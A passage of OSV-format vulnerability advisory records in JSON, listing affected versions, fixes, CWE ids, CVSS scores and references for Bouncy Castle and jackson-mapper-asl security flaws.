"pkg:maven/org.bouncycastle/bctls-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.78" } ] } ], "versions": [ "1.61", "1.62", "1.63", "1.64", "1.65", "1.67", "1.68", "1.69", "1.70", "1.71", "1.72", "1.73", "1.74", "1.75", "1.76", "1.77" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-v435-xc8x-wvr9/GHSA-v435-xc8x-wvr9.json" } }, { "package": { "name": "org.bouncycastle:bctls-jdk15to18", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bctls-jdk15to18" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.78" } ] } ], "versions": [ "1.63", "1.64", "1.65", "1.66", "1.67", "1.68", "1.69", "1.70", "1.71", "1.72", "1.73", "1.74", "1.75", "1.76", "1.77" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-v435-xc8x-wvr9/GHSA-v435-xc8x-wvr9.json" } }, { "package": { "name": "BouncyCastle", "ecosystem": "NuGet", "purl": "pkg:nuget/BouncyCastle" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "1.7.0", "1.8.1", "1.8.2", "1.8.3", "1.8.3.1", "1.8.4", "1.8.5", "1.8.6", "1.8.6.1", "1.8.9" ], "database_specific": { "last_known_affected_version_range": "\u003c 2.3.1", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-v435-xc8x-wvr9/GHSA-v435-xc8x-wvr9.json" } }, { "package": { "name": "BouncyCastle.Cryptography", "ecosystem": "NuGet", "purl": "pkg:nuget/BouncyCastle.Cryptography" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.3.1" } ] } ], "versions": [ "2.0.0", "2.1.0", "2.1.1", "2.2.0", "2.2.1", "2.3.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-v435-xc8x-wvr9/GHSA-v435-xc8x-wvr9.json" } } ], "references": [ { 
"type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30171" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-csharp/commit/c984b8bfd8544dfc55dba91a02cbbbb9c580c217" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/d7d5e735abd64bf0f413f54fd9e495fc02400fb0" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/e0569dcb1dea9d421d84fc4c5c5688fe101afa2d" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-csharp/wiki/CVE%E2%80%902024%E2%80%9030171" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/wiki/CVE%E2%80%902024%E2%80%9030171" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240614-0008" }, { "type": "WEB", "url": "https://www.bouncycastle.org/latest_releases.html" } ], "database_specific": { "cwe_ids": [ "CWE-203" ], "github_reviewed": true, "github_reviewed_at": "2024-05-14T20:22:03Z", "nvd_published_at": "2024-05-14T15:21:52Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-w285-wf9q-5w69", "published": "2018-10-17T16:27:38Z", "modified": "2025-09-12T20:11:36.505110Z", "aliases": [ "CVE-2016-1000352" ], "summary": "In Bouncy Castle JCE Provider the ECIES implementation allowed the use of ECB mode", "details": "In the Bouncy Castle JCE Provider version 1.55 and earlier the ECIES implementation allowed the use of ECB mode. 
This mode is regarded as unsafe and support for it has been removed from the provider.", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.38", "1.43", "1.44", "1.45", "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.53", "1.54", "1.55" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-w285-wf9q-5w69/GHSA-w285-wf9q-5w69.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.32", "1.38", "1.40", "1.43", "1.44", "1.45", "1.46" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-w285-wf9q-5w69/GHSA-w285-wf9q-5w69.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-w285-wf9q-5w69/GHSA-w285-wf9q-5w69.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-1000352" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/9385b0ebd277724b167fe1d1456e3c112112be1f" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2669" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2927" }, { "type": "ADVISORY", "url": 
"https://github.com/advisories/GHSA-w285-wf9q-5w69" }, { "type": "PACKAGE", "url": "https://github.com/bcgit/bc-java" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20181127-0004" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" } ], "database_specific": { "cwe_ids": [ "CWE-326" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:59:14Z", "nvd_published_at": "2018-06-04T21:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-wjxj-5m7g-mg7q", "published": "2023-11-23T18:30:33Z", "modified": "2024-10-22T05:28:59.117892Z", "aliases": [ "CGA-q98p-rjg3-8jq7", "CVE-2023-33202" ], "related": [ "CGA-hq55-qp37-gwm6" ], "summary": "Bouncy Castle Denial of Service (DoS)", "details": "Bouncy Castle for Java before 1.73 contains a potential Denial of Service (DoS) issue within the Bouncy Castle org.bouncycastle.openssl.PEMParser class. This class parses OpenSSL PEM encoded streams containing X.509 certificates, PKCS8 encoded keys, and PKCS7 objects. 
Parsing a file that has crafted ASN.1 data through the PEMParser causes an OutOfMemoryError, which can enable a denial of service attack.", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-ext-jdk16", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-ext-jdk16" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.73" } ] } ], "versions": [ "1.45", "1.46" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-wjxj-5m7g-mg7q/GHSA-wjxj-5m7g-mg7q.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.73" } ] } ], "versions": [ "1.38", "1.43", "1.44", "1.45", "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.53", "1.54", "1.55", "1.56", "1.57", "1.58", "1.59", "1.60", "1.61", "1.62", "1.63", "1.64", "1.65", "1.67", "1.68", "1.69", "1.70", "1.71", "1.72" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-wjxj-5m7g-mg7q/GHSA-wjxj-5m7g-mg7q.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.73" } ] } ], "versions": [ "1.32", "1.38", "1.40", "1.43", "1.44", "1.45", "1.46" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-wjxj-5m7g-mg7q/GHSA-wjxj-5m7g-mg7q.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15to18", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15to18" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.73" } ] } ], "versions": [ "1.63", "1.64", "1.65", 
"1.66", "1.67", "1.68", "1.69", "1.70", "1.71", "1.72" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-wjxj-5m7g-mg7q/GHSA-wjxj-5m7g-mg7q.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk16", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk16" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.73" } ] } ], "versions": [ "1.38", "1.40", "1.43", "1.44", "1.45", "1.46" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-wjxj-5m7g-mg7q/GHSA-wjxj-5m7g-mg7q.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55", "1.56", "1.57", "1.58", "1.59", "1.60", "1.61", "1.62", "1.63", "1.64", "1.65", "1.65.01", "1.66", "1.67", "1.68", "1.69", "1.70" ], "database_specific": { "last_known_affected_version_range": "\u003c 1.70", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-wjxj-5m7g-mg7q/GHSA-wjxj-5m7g-mg7q.json" } }, { "package": { "name": "org.bouncycastle:bcpkix-jdk18on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcpkix-jdk18on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.73" } ] } ], "versions": [ "1.71", "1.71.1", "1.72" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-wjxj-5m7g-mg7q/GHSA-wjxj-5m7g-mg7q.json" } }, { "package": { "name": "org.bouncycastle:bcprov-ext-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-ext-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ 
{ "introduced": "0" }, { "fixed": "1.73" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55", "1.56", "1.57", "1.58", "1.59", "1.60", "1.61", "1.62", "1.63", "1.64", "1.65", "1.66", "1.67", "1.68", "1.69", "1.70" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-wjxj-5m7g-mg7q/GHSA-wjxj-5m7g-mg7q.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk18on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk18on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.73" } ] } ], "versions": [ "1.71", "1.71.1", "1.72" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-wjxj-5m7g-mg7q/GHSA-wjxj-5m7g-mg7q.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33202" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/0c576892862ed41894f49a8f639112e8d66d229c" }, { "type": "WEB", "url": "https://bouncycastle.org" }, { "type": "PACKAGE", "url": "https://github.com/bcgit/bc-java" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/wiki/CVE-2023-33202" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240125-0001" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2023-11-24T16:54:01Z", "nvd_published_at": "2023-11-23T16:15:07Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-wrwf-pmmj-w989", "published": "2022-05-13T01:14:24Z", "modified": "2023-11-08T03:58:54.947561Z", "aliases": [ "CVE-2017-13098" ], "summary": "Observable Discrepancy in BouncyCastle", "details": "BouncyCastle TLS prior to version 1.0.3, when configured to use the JCE (Java 
Cryptography Extension) for cryptographic functions, provides a weak Bleichenbacher oracle when any TLS cipher suite using RSA key exchange is negotiated. An attacker can recover the private key from a vulnerable application. This vulnerability is referred to as \"ROBOT.\"", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.0.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-wrwf-pmmj-w989/GHSA-wrwf-pmmj-w989.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-13098" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/a00b684465b38d722ca9a3543b8af8568e6bad5c" }, { "type": "PACKAGE", "url": "https://github.com/bcgit/bc-java" }, { "type": "WEB", "url": "https://robotattack.org" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20171222-0001" }, { "type": "WEB", "url": "https://www.debian.org/security/2017/dsa-4072" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00011.html" }, { "type": "WEB", "url": "http://www.kb.cert.org/vuls/id/144389" } ], "database_specific": { "cwe_ids": [ "CWE-203" ], "github_reviewed": true, "github_reviewed_at": "2022-07-01T20:14:25Z", "nvd_published_at": "2017-12-13T01:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-xqj7-j8j5-f2xr", "published": "2018-10-16T17:44:39Z", "modified": "2025-09-12T20:04:13.290612Z", "aliases": [ "CVE-2018-1000180" ], "summary": "Bouncy Castle has a flaw in the Low-level interface to RSA key pair generator", 
"details": "Bouncy Castle BC 1.54 - 1.59, BC-FJA 1.0.0, BC-FJA 1.0.1 and earlier have a flaw in the Low-level interface to RSA key pair generator, specifically RSA Key Pairs generated in low-level API with added certainty may have less M-R tests than expected. This appears to be fixed in versions BC 1.60 beta 4 and later, BC-FJA 1.0.2 and later.", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.60" } ] } ], "versions": [ "1.38", "1.43", "1.44", "1.45", "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.53", "1.54", "1.55", "1.56", "1.57", "1.58", "1.59" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-xqj7-j8j5-f2xr/GHSA-xqj7-j8j5-f2xr.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.60" } ] } ], "versions": [ "1.32", "1.38", "1.40", "1.43", "1.44", "1.45", "1.46" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-xqj7-j8j5-f2xr/GHSA-xqj7-j8j5-f2xr.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.60" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55", "1.56", "1.57", "1.58", "1.59" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-xqj7-j8j5-f2xr/GHSA-xqj7-j8j5-f2xr.json" } } ], "references": [ { "type": "ADVISORY", "url": 
"https://nvd.nist.gov/vuln/detail/CVE-2018-1000180" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/22467b6e8fe19717ecdf201c0cf91bacf04a55ad" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/73780ac522b7795fc165630aba8d5f5729acc839" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2018/dsa-4233" }, { "type": "WEB", "url": "https://www.bountysource.com/issues/58293083-rsa-key-generation-computation-of-iterations-for-mr-primality-test" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190204-0003" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/wiki/CVE-2018-1000180" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-xqj7-j8j5-f2xr" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0877" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2669" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2643" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2428" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2425" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2424" }, { "type": "WEB", "url": 
"https://access.redhat.com/errata/RHSA-2018:2423" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/106567" } ], "database_specific": { "cwe_ids": [ "CWE-327" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T22:04:14Z", "nvd_published_at": "2018-06-05T13:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-c27h-mcmw-48hv", "published": "2022-05-24T16:57:28Z", "modified": "2024-03-11T05:32:32.879730Z", "aliases": [ "CVE-2019-10202" ], "related": [ "CGA-2267-f6h9-4h4p", "CGA-2v7f-j393-2r48", "CGA-5q42-fr7m-wmqh", "CGA-g9g4-vq86-q338" ], "summary": "Deserialization of Untrusted Data in org.codehaus.jackson:jackson-mapper-asl", "details": "A series of deserialization vulnerabilities have been discovered in Codehaus 1.9.x implemented in EAP 7. This CVE fixes CVE-2017-17485, CVE-2017-7525, CVE-2017-15095, CVE-2018-5968, CVE-2018-7489, CVE-2018-1000873, CVE-2019-12086 reported for FasterXML jackson-databind by implementing a whitelist approach that will mitigate these vulnerabilities and future ones alike.", "affected": [ { "package": { "name": "org.codehaus.jackson:jackson-mapper-asl", "ecosystem": "Maven", "purl": "pkg:maven/org.codehaus.jackson/jackson-mapper-asl" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "1.9.13" } ] } ], "versions": [ "0.9.6", "0.9.7", "0.9.8", "0.9.9", "0.9.9-2", "0.9.9-3", "0.9.9-4", "0.9.9-5", "0.9.9-6", "1.0.0", "1.0.1", "1.1.0", "1.1.1", "1.1.2", "1.2.0", "1.2.1", "1.3.0", "1.3.1", "1.3.2", "1.3.3", "1.3.4", "1.3.5", "1.4.0", "1.4.1", "1.4.2", "1.4.3", "1.4.4", "1.4.5", "1.5.0", "1.5.1", "1.5.2", "1.5.3", "1.5.4", "1.5.5", "1.5.6", "1.5.7", "1.5.8", "1.6.0", "1.6.1", "1.6.2", "1.6.3", "1.6.4", "1.6.5", "1.6.6", "1.6.7", "1.6.9", "1.7.0", "1.7.1", "1.7.2", "1.7.3", "1.7.4", "1.7.5", "1.7.6", "1.7.7", "1.7.8", "1.7.9", "1.8.0", "1.8.1", "1.8.10", "1.8.11", 
"1.8.2", "1.8.3", "1.8.4", "1.8.5", "1.8.6", "1.8.7", "1.8.8", "1.8.9", "1.9.0", "1.9.1", "1.9.10", "1.9.11", "1.9.12", "1.9.13", "1.9.2", "1.9.3", "1.9.4", "1.9.5", "1.9.6", "1.9.7", "1.9.8", "1.9.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-c27h-mcmw-48hv/GHSA-c27h-mcmw-48hv.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10202" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/refea6018a2c4e9eb7838cab567ed219c3f726dcd83a5472fbb80d8d9@%3Cissues.flume.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/refea6018a2c4e9eb7838cab567ed219c3f726dcd83a5472fbb80d8d9%40%3Cissues.flume.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rce00a1c60f7df4b10e72fa87827c102f55b074bb91993631df2c21f9@%3Cdev.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rce00a1c60f7df4b10e72fa87827c102f55b074bb91993631df2c21f9%40%3Cdev.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6dea2a887f5eb1d68f124d64b14cd1a04f682f06de8cd01b7e4214e0@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6dea2a887f5eb1d68f124d64b14cd1a04f682f06de8cd01b7e4214e0%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5f16a1bd31a7e94ca78eda686179930781aa3a4a990cd55986703581@%3Cdev.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5f16a1bd31a7e94ca78eda686179930781aa3a4a990cd55986703581%40%3Cdev.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r500867b74f42230a3d65b8aec31fc93ac390eeae737c91a759ab94cb@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r500867b74f42230a3d65b8aec31fc93ac390eeae737c91a759ab94cb%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r356592d9874ab4bc9da4754592f8aa6edc894c95e17e58484bc2af7a@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r356592d9874ab4bc9da4754592f8aa6edc894c95e17e58484bc2af7a%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1edabcfacdad42d3c830464e9cf07a9a489059a7b7a8642cf055542d@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1edabcfacdad42d3c830464e9cf07a9a489059a7b7a8642cf055542d%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0fbf2c60967bc9f73d7f5a62ad3b955789f9a14b950f42e99fca9b4e@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0fbf2c60967bc9f73d7f5a62ad3b955789f9a14b950f42e99fca9b4e%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10202" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2023-02-14T00:56:25Z", "nvd_published_at": "2019-10-01T15:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-r6j9-8759-g62w", "published": "2020-02-04T22:39:19Z", "modified": "2025-03-09T12:26:53.613046Z", "aliases": [ "CGA-6cwv-3jmj-96j9", "CVE-2019-10172" ], "related": [ "CGA-2wfh-9vp6-5hj5", "CGA-7pfp-wfcr-cm2m", "CGA-93w3-x4hw-7w7g", "CGA-cxxv-5q2j-64j3", "CGA-r6m9-c4ph-7jgx" ], "summary": "Improper Restriction of XML External Entity Reference in jackson-mapper-asl", "details": "A flaw was found in org.codehaus.jackson:jackson-mapper-asl:1.9.x libraries. 
XML external entity vulnerabilities similar to CVE-2016-3720 also affects codehaus jackson-mapper-asl libraries but in different classes.", "affected": [ { "package": { "name": "org.codehaus.jackson:jackson-mapper-asl", "ecosystem": "Maven", "purl": "pkg:maven/org.codehaus.jackson/jackson-mapper-asl" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "1.9.13" } ] } ], "versions": [ "0.9.6", "0.9.7", "0.9.8", "0.9.9", "0.9.9-2", "0.9.9-3", "0.9.9-4", "0.9.9-5", "0.9.9-6", "1.0.0", "1.0.1", "1.1.0", "1.1.1", "1.1.2", "1.2.0", "1.2.1", "1.3.0", "1.3.1", "1.3.2", "1.3.3", "1.3.4", "1.3.5", "1.4.0", "1.4.1", "1.4.2", "1.4.3", "1.4.4", "1.4.5", "1.5.0", "1.5.1", "1.5.2", "1.5.3", "1.5.4", "1.5.5", "1.5.6", "1.5.7", "1.5.8", "1.6.0", "1.6.1", "1.6.2", "1.6.3", "1.6.4", "1.6.5", "1.6.6", "1.6.7", "1.6.9", "1.7.0", "1.7.1", "1.7.2", "1.7.3", "1.7.4", "1.7.5", "1.7.6", "1.7.7", "1.7.8", "1.7.9", "1.8.0", "1.8.1", "1.8.10", "1.8.11", "1.8.2", "1.8.3", "1.8.4", "1.8.5", "1.8.6", "1.8.7", "1.8.8", "1.8.9", "1.9.0", "1.9.1", "1.9.10", "1.9.11", "1.9.12", "1.9.13", "1.9.2", "1.9.3", "1.9.4", "1.9.5", "1.9.6", "1.9.7", "1.9.8", "1.9.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-r6j9-8759-g62w/GHSA-r6j9-8759-g62w.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10172" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00039.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra37700b842790883b9082e6b281fb7596f571b13078a4856cd38f2c2@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra37700b842790883b9082e6b281fb7596f571b13078a4856cd38f2c2%40%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r80e8882c86c9c17a57396a5ef7c4f08878d629a0291243411be0de3a@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r80e8882c86c9c17a57396a5ef7c4f08878d629a0291243411be0de3a%40%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6dea2a887f5eb1d68f124d64b14cd1a04f682f06de8cd01b7e4214e0@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6dea2a887f5eb1d68f124d64b14cd1a04f682f06de8cd01b7e4214e0%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r68acf97f4526ba59a33cc6e592261ea4f85d890f99e79c82d57dd589@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": 